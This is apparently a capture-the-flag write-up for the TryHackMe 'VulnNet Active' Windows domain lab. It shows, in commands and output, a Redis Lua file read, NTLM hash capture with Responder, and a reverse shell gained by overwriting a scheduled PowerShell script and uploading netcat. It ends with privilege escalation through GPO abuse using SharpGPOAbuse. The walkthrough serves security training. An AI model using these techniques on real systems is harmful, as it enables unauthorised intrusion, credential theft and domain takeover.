# Nmap 7.91 scan initiated Sun Aug 1 15:06:30 2021 as: nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12
Nmap scan report for 10.10.188.12
Host is up, received user-set (0.055s latency).
Scanned at 2021-08-01 15:06:30 CEST for 187s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
6379/tcp open redis syn-ack Redis key-value store 2.8.2402
9389/tcp open mc-nmf syn-ack .NET Message Framing
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49695/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 9176/tcp): CLEAN (Timeout)
| Check 2 (port 50061/tcp): CLEAN (Timeout)
| Check 3 (port 54977/udp): CLEAN (Timeout)
| Check 4 (port 50181/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-01T13:08:59
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 1 15:09:37 2021 -- 1 IP address (1 host up) scanned in 187.42 seconds
Interesting ports... 139, 445, 6379
SMB enumeration
Maybe SMB will disclose any useful information. Simply connecting to the target machine using smbclient doesn't help much.
┌──(n㉿kali)-[~]
└─$ smbclient -L \\\\10.10.188.12
Enter WORKGROUP\n's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
However, we are able to at least identify a hostname and domain name using crackmapexec.
After hours of research, it turns out that Redis can execute sandboxed Lua scripts through the “EVAL” command. dofile() is a command that can be used to enumerate files and directories. dofile() is allowed by the sandbox in older Redis versions.
If the Lua script is syntactically invalid or tries to set global variables, some content of the target file will be leaked through the error messages.
Why not try reading the user.txt file?
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_ce5d85ea1418770097e56c1b605053114cc3ff2e): @user_script:1: C:\Users\enterprise-security\Desktop\user.txt:1: malformed number near 'FLAG-REDACTED'
Capturing NTLMv2 hash
Maybe there is a way to capture an NTLM hash? Let's give that a try by running Responder.
┌──(n㉿kali)-[~]
└─$ sudo responder -I tun0
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.1.246]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MJ06EI78D1C]
Responder Domain Name [7KD0.LOCAL]
Responder DCE-RPC Port [45088]
[+] Listening for events...
Using the "EVAL" command, we can instruct the target system to connect back to our target machine.
Using the username and password we found earlier, we can try enumerating SMB again.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient -L \\\\10.10.188.12 -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Let's check out the Enterprise-Share share.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Feb 23 23:45:41 2021
.. D 0 Tue Feb 23 23:45:41 2021
PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 01:33:18 2021
9558271 blocks of size 4096. 4996387 blocks available
The PurgeIrrelevantData_1826.ps1 script seems to be a part of some scheduled task.
Setting up a Netcat listener
I wonder if we can spawn a shell by overwriting the contents of this ps1 file.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
Command Injection - Powershell
Let's modify the contents of PurgeIrrelevantData_1826.ps1 so that it will spawn a shell for us.
We can overwrite the file with our edited version of the script on the target machine.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (4.3 kb/s) (average 4.3 kb/s)
smb: \> put nc.exe
putting file nc.exe as \nc.exe (288.6 kb/s) (average 186.3 kb/s)
I also uploaded the Netcat executable since I didn't receive any STDERR / STDOUT while enumerating the machine using Powershell.
Receiving a shell
WE GOT A SHELL!
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 49872
whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads>
A more stable shell
┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...
Necesarry? No. But definitely helpful when you accidentally exit out of your shell.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 50037
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\enterprise-share>
PowerView - enumeration
After hours of enumeration, I found something interesting.
Two GPOs: security-pol-vn and Default Domain Controllers Policy.
PS C:\enterprise-share> .\sharphound.exe
----------------------------------------------
Initializing SharpHound at 1:49 PM on 8/4/2021
----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain VULNNET.LOCAL using path CN=Schema,CN=Configuration,DC=vulnnet,DC=local
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 59 objects finished (+59 59)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.1978320
Compressing data to .\20210804134951_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 1:49 PM on 8/4/2021! Happy Graphing!
Shortest Path to Domain Admin
Querying BloodHound, we find that our enterprise-security user has GenericWrite access on the security-pol-vn GPO which is being applied to essentially all objects within the vulnnet.local domain.
Maybe we can exploit this misconfiguration.... Let's find out!
Abusing GPO permissions
Let's see what we can do to escalate our privileges.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
PS C:\enterprise-share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\enterprise-share> gpupdate /force
gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Let's review our group memberships after we forced the policies to be updated on the target machine.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
There we go! The enterprise-security account is now a local administrator.
Obtaining the system flag
Now that we have more privileges, let's access the C$ share and grab the system.txt file.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\C$ -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
smb: \users\Administrator\Desktop\> ls
. DR 0 Wed Feb 24 05:27:33 2021
.. DR 0 Wed Feb 24 05:27:33 2021
desktop.ini AHS 282 Mon Feb 22 22:55:21 2021
system.txt A 37 Wed Feb 24 05:27:45 2021
9558271 blocks of size 4096. 5011466 blocks available
smb: \users\Administrator\Desktop\> mget system.txt
Get file system.txt? y
getting file \users\Administrator\Desktop\system.txt of size 37 as system.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
